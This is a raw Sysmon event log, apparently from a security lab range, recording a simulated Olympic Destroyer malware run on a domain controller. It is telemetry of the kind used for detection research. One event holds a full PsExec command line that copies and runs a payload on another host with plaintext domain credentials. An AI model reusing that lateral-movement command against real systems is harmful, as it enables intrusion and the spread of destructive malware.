11:11:05.478{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1649-6216-F706-000000003802}7112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.331{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000296360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.325{C8EA50B7-162E-6216-EF06-000000003802}7064C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 354300x8000000000000000296359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.404{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49336-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.404{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49336-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000296380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:06.861{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F96A0C8ED3A48B32C636BECF2D087A8,SHA256=E6DC042A69684AFDAA5359B2C420D7773EE8895900D416A597D623BC71B7B038,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:03.630{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51580-false10.0.1.12-8000- 23542300x8000000000000000220422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:06.758{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BA49BD50ECDF6B77B01B5EF6CD402BB,SHA256=46B1EDD9C6AAF8D2F8B02539B373D2F77F0EE365F4B30FE58F29EBD73FBF71F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:06.141{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000296378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:06.141{C8EA50B7-162F-6216-F106-000000003802}7144C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000296382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:07.883{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E628B2EA727B7BA2F02B61BECA65EDEA,SHA256=3522AFE888A89CBAF95E539179AE2282A1A70A91AB57285BF22FB39D4E720FD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:07.774{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF8007E684FA990B14D70E558712E4AA,SHA256=C1E77AE130059737430CC029568FE3A900019B4625C84AAE4B884503D941D446,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:04.630{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49337-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:08.915{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=706981C214C47F5A73E5F51556109864,SHA256=7AFCA80A294987956A75ED8EB5F18F976A3F2E49E7E3D084965C1F22DA0BC097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:08.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9FFC0D723A3D69009D36B38DC955D69,SHA256=AEA2337845C3F81075A8602D89C63FB7658B02C2CA9F18782FD839A549DF7E61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:09.929{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=153FF1116CACF9A6D2E8AD2A2FB04FBD,SHA256=E9C987A8CADFBA8F1621FFABF0C34D4B676D976CB2614E7C359BE684AA26E33C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:09.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48FA852D123B25743894ABC22629BD8F,SHA256=CE87CEF276DCCB37D0676DD67E9355D63E517D04404554AF7CFF2DDBBBE6BA73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:10.944{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E16DB5D212D6EFDCC9F32808A68BEFB,SHA256=2266101C24A48B6CA69B2B7043F0B24404EE5BC498D072306BDB1479E0CEE754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220427Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:10.805{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1622EA77A80FC9420A541E6CD3292B06,SHA256=C0A49E475E9EDBB78577B7A8DF58EEC0432F82F6303400E12DE1D214AD3CA6DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:11.963{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=767C0DCD3B8BEBED9F48FA13A175293A,SHA256=8A0BB058CA3DC417C122F22BC2505DCDFA91664CAB238EC5C53DEE5C43A1F787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:11.821{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0340517752FC1B05755B824521DFD5E8,SHA256=1B93A1CB2C1584B7E0A9E5C0266C716E6D6C4181674760331232D27744473042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:12.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E2AC2ACC05B00202ED9D61C36EA973,SHA256=A834A4F67A729F11889E8C880B48B3B2B7E7FACD5371BCED32239876063B3DE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:12.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAA9489B5B81019E7C1695D768ABEA3,SHA256=A3110DD01E1C0DCFB84E505959EF945E8A1A6C838F580F10B488B484328D6A3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:09.718{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49341-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000220429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:09.522{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51581-false10.0.1.12-8000- 23542300x8000000000000000296389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:13.995{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6A7188EEE5EF55B3E5E04BB3656F054,SHA256=E90E5E93C1AF308AB52ACA5529E097ED5183F490962102C7F0782712E549A97A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:14.133{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2282360A09CBB00924140C078DF56D83,SHA256=DF63439476F689C2D89791708F629E7CC665E54EDBDBFC36A87D2E963B044184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:15.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7978281E588FBCE0D04277503055F08,SHA256=4610EF5772F5E0E83B28EFB449065DDCA6ABEB471D113692B74D9498D46426A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:14.996{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B313174BBF44AD769C82997B01AF71,SHA256=FAF955810E375FDD2DAFFC6BFB8610CFD1925E94B08E63B9F571AEE50794FA52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:16.352{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9662F5428F815AB1ABCBFA41259361C4,SHA256=084E71E7DBC48C1D77A752DD0A6E74B4ECCF6D0AF921427F55C534EB75BF7D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:16.012{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F417DB8216BB44BDB7EBD05BFD8FBE46,SHA256=61D94E3F77848D14B5665A658F81419DC66B5F146A0CEC3084D54D4885F83A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:17.368{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E0AD0DF8E94F322337E879DD4FC1168,SHA256=24F0EF92FB2FF030D20C40662CF38887C0AF832B3678E0CD7495A15B2F0BAB45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:17.043{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23AD1EEA1ABC054A503038815923E8A1,SHA256=EFDC04A9921E71D970E7CD1FA23F5D9B1DE1F5D2792991892E7F90FC4165431D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:14.599{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51582-false10.0.1.12-8000- 23542300x8000000000000000220436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:18.493{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3A7032BA51690C7657CBCD0318195D,SHA256=21E9E5481A5E150EF5377F8414853A2E526B9804705B2BA8DCE8E116A0227CE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:15.486{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49342-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:18.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A54AE521A8E52A01B4CCDD3EC91491E,SHA256=533C262039E82043778B9579FBC322557C0F38DCC53E9FDBBD86E787C0ADD76A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:19.864{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1657-6216-F906-000000003802}6544C:\Program 